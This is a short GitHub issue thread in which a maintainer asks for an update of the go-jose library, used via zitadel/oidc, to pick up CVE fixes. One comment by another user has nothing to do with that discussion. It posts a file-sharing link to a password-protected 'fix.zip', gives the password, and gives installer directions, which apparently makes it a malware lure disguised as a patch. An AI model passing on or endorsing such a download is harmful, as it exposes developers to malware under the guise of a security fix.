### ISSUE TITLE
Update go-jose to avoid CVEs

### ISSUE THREAD

**Issue by andrewpmartinez** [openziti/ziti#2353]
`github.com/zitadel/oidc` v2 uses an out of date go-jose repository path. The new go-jose repository has CVE fixes. The downstream repository needs to be updated.

**Comment by kyy23** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by andrewpmartinez** [comment]
See https://github.com/zitadel/oidc/pull/630

For the `oidc` PR. Awaiting a response from the zitadel team.
